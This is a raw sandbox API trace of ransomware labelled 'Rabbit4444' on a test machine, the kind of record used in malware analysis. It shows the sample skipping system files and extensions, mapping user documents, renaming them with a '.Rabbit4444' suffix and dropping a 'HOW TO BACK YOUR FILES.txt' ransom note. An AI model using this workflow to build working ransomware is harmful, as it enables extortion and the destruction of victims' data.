(HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0049.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0049.845] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14115590611) returned 1 [0049.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0049.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0049.845] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.846] CloseHandle (hObject=0x298) returned 1 [0049.846] CloseHandle (hObject=0x278) returned 1 [0049.847] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\6XPv\\_kq3J7tr.doc.Rabbit4444") returned 54 [0049.847] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\_kq3J7tr.doc" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\_kq3j7tr.doc"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\_kq3J7tr.doc.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\_kq3j7tr.doc.rabbit4444"), dwFlags=0x1) returned 1 [0049.849] InterlockedExchangeAdd (in: Addend=0xff618, Value=62400 | out: Addend=0xff618) returned 23623392 [0049.849] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3708 [0049.849] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48c7eeb0, ftCreationTime.dwHighDateTime=0x1d4c62c, ftLastAccessTime.dwLowDateTime=0xfc3ca260, ftLastAccessTime.dwHighDateTime=0x1d4d045, ftLastWriteTime.dwLowDateTime=0xfc3ca260, ftLastWriteTime.dwHighDateTime=0x1d4d045, nFileSizeHigh=0x0, nFileSizeLow=0xf3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_kq3J7tr.doc", cAlternateFileName="")) returned 0 [0049.849] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0049.849] lstrcpyW (in: lpString1=0x130eb76, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.849] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.849] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.849] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.850] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.850] CloseHandle (hObject=0x278) returned 1 [0049.850] CloseHandle (hObject=0x27c) returned 1 [0049.850] GetCurrentThreadId () returned 0xd98 [0049.850] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0049.850] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP") returned="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP" [0049.850] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11c5e0 | out: hHeap=0xe0000) returned 1 [0049.850] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0049.850] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP") returned="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP" [0049.850] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\") returned="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\" [0049.850] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\.BFC0E91B00AE8A0620D3" [0049.850] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.851] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.855] FlushFileBuffers (hFile=0x27c) returned 1 [0049.856] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.856] CloseHandle (hObject=0x27c) returned 1 [0049.861] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP") returned 45 [0049.861] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.861] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8890f60, ftCreationTime.dwHighDateTime=0x1d4c971, ftLastAccessTime.dwLowDateTime=0xfb983b10, ftLastAccessTime.dwHighDateTime=0x1d4d5e2, ftLastWriteTime.dwLowDateTime=0xe7095c9c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0049.861] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.861] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.861] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.861] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.861] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8890f60, ftCreationTime.dwHighDateTime=0x1d4c971, ftLastAccessTime.dwLowDateTime=0xfb983b10, ftLastAccessTime.dwHighDateTime=0x1d4d5e2, ftLastWriteTime.dwLowDateTime=0xe7095c9c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.861] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.861] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.861] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.861] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.861] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.861] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16d4aa70, ftCreationTime.dwHighDateTime=0x1d4c9fa, ftLastAccessTime.dwLowDateTime=0x1dfd6e40, ftLastAccessTime.dwHighDateTime=0x1d4c5a9, ftLastWriteTime.dwLowDateTime=0x1dfd6e40, ftLastWriteTime.dwHighDateTime=0x1d4c5a9, nFileSizeHigh=0x0, nFileSizeLow=0xbe01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-aRcJA7jEmHzJ7r.ots", cAlternateFileName="-ARCJA~1.OTS")) returned 1 [0049.862] lstrcmpiW (lpString1="-aRcJA7jEmHzJ7r.ots", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.862] lstrcmpiW (lpString1="-aRcJA7jEmHzJ7r.ots", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.862] lstrcmpiW (lpString1="-aRcJA7jEmHzJ7r.ots", lpString2="Rabbit4444.exe") returned -1 [0049.862] lstrcmpiW (lpString1="-aRcJA7jEmHzJ7r.ots", lpString2=".") returned 1 [0049.862] lstrcmpiW (lpString1="-aRcJA7jEmHzJ7r.ots", lpString2="..") returned 1 [0049.862] lstrcmpiW (lpString1="-aRcJA7jEmHzJ7r.ots", lpString2="windows") returned -1 [0049.862] lstrcmpiW (lpString1="-aRcJA7jEmHzJ7r.ots", lpString2="bootmgr") returned -1 [0049.862] lstrcmpiW (lpString1="-aRcJA7jEmHzJ7r.ots", lpString2="pagefile.sys") returned -1 [0049.862] lstrcmpiW (lpString1="-aRcJA7jEmHzJ7r.ots", lpString2="boot") returned -1 [0049.862] lstrcmpiW (lpString1="-aRcJA7jEmHzJ7r.ots", lpString2="ids.txt") returned -1 [0049.862] lstrcmpiW (lpString1="-aRcJA7jEmHzJ7r.ots", lpString2="NTUSER.DAT") returned -1 [0049.862] lstrcpyW (in: lpString1=0x130eb94, lpString2="-aRcJA7jEmHzJ7r.ots" | out: lpString1="-aRcJA7jEmHzJ7r.ots") returned="-aRcJA7jEmHzJ7r.ots" [0049.862] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\-aRcJA7jEmHzJ7r.ots", dwFileAttributes=0x0) returned 1 [0049.862] lstrlenW (lpString="-aRcJA7jEmHzJ7r.ots") returned 19 [0049.862] lstrlenW (lpString="Rabbit4444") returned 10 [0049.862] lstrcmpiW (lpString1="mHzJ7r.ots", lpString2="Rabbit4444") returned -1 [0049.862] lstrlenW (lpString=".dll") returned 4 [0049.862] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0049.862] lstrlenW (lpString=".lnk") returned 4 [0049.862] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0049.862] lstrlenW (lpString=".ini") returned 4 [0049.862] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0049.862] lstrlenW (lpString=".sys") returned 4 [0049.862] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0049.862] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\-aRcJA7jEmHzJ7r.ots" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\-arcja7jemhzj7r.ots"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.862] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.862] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14117327177) returned 1 [0049.863] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=48641) returned 1 [0049.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0049.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0049.863] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc110, lpName=0x0) returned 0x298 [0049.863] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc110) returned 0x70000 [0049.864] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.864] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.864] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0049.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0049.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.865] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14117566420) returned 1 [0049.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0049.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0049.865] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.866] CloseHandle (hObject=0x298) returned 1 [0049.866] CloseHandle (hObject=0x278) returned 1 [0049.867] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\-aRcJA7jEmHzJ7r.ots.Rabbit4444") returned 76 [0049.867] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\-aRcJA7jEmHzJ7r.ots" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\-arcja7jemhzj7r.ots"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\-aRcJA7jEmHzJ7r.ots.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\-arcja7jemhzj7r.ots.rabbit4444"), dwFlags=0x1) returned 1 [0049.867] InterlockedExchangeAdd (in: Addend=0xff618, Value=48656 | out: Addend=0xff618) returned 23685792 [0049.867] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3710 [0049.867] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe7095c9c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe7095c9c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe7095c9c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.867] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.867] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.867] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d1b34c0, ftCreationTime.dwHighDateTime=0x1d4cc71, ftLastAccessTime.dwLowDateTime=0x99341570, ftLastAccessTime.dwHighDateTime=0x1d4ce2b, ftLastWriteTime.dwLowDateTime=0x99341570, ftLastWriteTime.dwHighDateTime=0x1d4ce2b, nFileSizeHigh=0x0, nFileSizeLow=0xe36f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="81WfwdP.ppt", cAlternateFileName="")) returned 1 [0049.867] lstrcmpiW (lpString1="81WfwdP.ppt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.867] lstrcmpiW (lpString1="81WfwdP.ppt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.867] lstrcmpiW (lpString1="81WfwdP.ppt", lpString2="Rabbit4444.exe") returned -1 [0049.868] lstrcmpiW (lpString1="81WfwdP.ppt", lpString2=".") returned 1 [0049.868] lstrcmpiW (lpString1="81WfwdP.ppt", lpString2="..") returned 1 [0049.868] lstrcmpiW (lpString1="81WfwdP.ppt", lpString2="windows") returned -1 [0049.868] lstrcmpiW (lpString1="81WfwdP.ppt", lpString2="bootmgr") returned -1 [0049.868] lstrcmpiW (lpString1="81WfwdP.ppt", lpString2="pagefile.sys") returned -1 [0049.868] lstrcmpiW (lpString1="81WfwdP.ppt", lpString2="boot") returned -1 [0049.868] lstrcmpiW (lpString1="81WfwdP.ppt", lpString2="ids.txt") returned -1 [0049.868] lstrcmpiW (lpString1="81WfwdP.ppt", lpString2="NTUSER.DAT") returned -1 [0049.868] lstrcpyW (in: lpString1=0x130eb94, lpString2="81WfwdP.ppt" | out: lpString1="81WfwdP.ppt") returned="81WfwdP.ppt" [0049.868] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\81WfwdP.ppt", dwFileAttributes=0x0) returned 1 [0049.868] lstrlenW (lpString="81WfwdP.ppt") returned 11 [0049.868] lstrlenW (lpString="Rabbit4444") returned 10 [0049.868] lstrcmpiW (lpString1="1WfwdP.ppt", lpString2="Rabbit4444") returned -1 [0049.868] lstrlenW (lpString=".dll") returned 4 [0049.868] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.868] lstrlenW (lpString=".lnk") returned 4 [0049.868] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0049.868] lstrlenW (lpString=".ini") returned 4 [0049.868] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0049.868] lstrlenW (lpString=".sys") returned 4 [0049.868] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0049.868] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\81WfwdP.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\81wfwdp.ppt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.868] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.868] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14117917377) returned 1 [0049.868] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=58223) returned 1 [0049.869] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0049.869] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0049.869] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe670, lpName=0x0) returned 0x298 [0049.869] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe670) returned 0x70000 [0049.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.870] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.870] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.871] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14118138187) returned 1 [0049.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0049.871] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0049.871] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.871] CloseHandle (hObject=0x298) returned 1 [0049.872] CloseHandle (hObject=0x278) returned 1 [0049.872] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\81WfwdP.ppt.Rabbit4444") returned 68 [0049.872] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\81WfwdP.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\81wfwdp.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\81WfwdP.ppt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\81wfwdp.ppt.rabbit4444"), dwFlags=0x1) returned 1 [0049.873] InterlockedExchangeAdd (in: Addend=0xff618, Value=58224 | out: Addend=0xff618) returned 23734448 [0049.873] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3712 [0049.873] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38033840, ftCreationTime.dwHighDateTime=0x1d4c73b, ftLastAccessTime.dwLowDateTime=0xccf51e90, ftLastAccessTime.dwHighDateTime=0x1d4c5ac, ftLastWriteTime.dwLowDateTime=0xccf51e90, ftLastWriteTime.dwHighDateTime=0x1d4c5ac, nFileSizeHigh=0x0, nFileSizeLow=0xbc49, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fHQ QkkX1TmC5OV.pdf", cAlternateFileName="FHQQKK~1.PDF")) returned 1 [0049.873] lstrcmpiW (lpString1="fHQ QkkX1TmC5OV.pdf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.873] lstrcmpiW (lpString1="fHQ QkkX1TmC5OV.pdf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.873] lstrcmpiW (lpString1="fHQ QkkX1TmC5OV.pdf", lpString2="Rabbit4444.exe") returned -1 [0049.873] lstrcmpiW (lpString1="fHQ QkkX1TmC5OV.pdf", lpString2=".") returned 1 [0049.873] lstrcmpiW (lpString1="fHQ QkkX1TmC5OV.pdf", lpString2="..") returned 1 [0049.873] lstrcmpiW (lpString1="fHQ QkkX1TmC5OV.pdf", lpString2="windows") returned -1 [0049.873] lstrcmpiW (lpString1="fHQ QkkX1TmC5OV.pdf", lpString2="bootmgr") returned 1 [0049.873] lstrcmpiW (lpString1="fHQ QkkX1TmC5OV.pdf", lpString2="pagefile.sys") returned -1 [0049.873] lstrcmpiW (lpString1="fHQ QkkX1TmC5OV.pdf", lpString2="boot") returned 1 [0049.873] lstrcmpiW (lpString1="fHQ QkkX1TmC5OV.pdf", lpString2="ids.txt") returned -1 [0049.873] lstrcmpiW (lpString1="fHQ QkkX1TmC5OV.pdf", lpString2="NTUSER.DAT") returned -1 [0049.873] lstrcpyW (in: lpString1=0x130eb94, lpString2="fHQ QkkX1TmC5OV.pdf" | out: lpString1="fHQ QkkX1TmC5OV.pdf") returned="fHQ QkkX1TmC5OV.pdf" [0049.873] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\fHQ QkkX1TmC5OV.pdf", dwFileAttributes=0x0) returned 1 [0049.873] lstrlenW (lpString="fHQ QkkX1TmC5OV.pdf") returned 19 [0049.873] lstrlenW (lpString="Rabbit4444") returned 10 [0049.873] lstrcmpiW (lpString1="TmC5OV.pdf", lpString2="Rabbit4444") returned 1 [0049.873] lstrlenW (lpString=".dll") returned 4 [0049.873] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.873] lstrlenW (lpString=".lnk") returned 4 [0049.873] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0049.873] lstrlenW (lpString=".ini") returned 4 [0049.873] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0049.873] lstrlenW (lpString=".sys") returned 4 [0049.873] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0049.874] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6XPv\\9FpAh6TVjmxPhP\\fHQ QkkX1TmC5OV.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\6xpv\\9fpah6tvjmxphp\\fhq qkkx1tmc5ov.pdf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.874] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.874] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14118444674) returned 1 [0049.874] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=48201) returned 1 [0049.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0049.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0049.874] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbf50, lpName=0x0) returned 0x298 [0049.874] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbf50) returned 0x70000 [0049.875] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.876] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0049.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.876] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0049.876] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.876] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 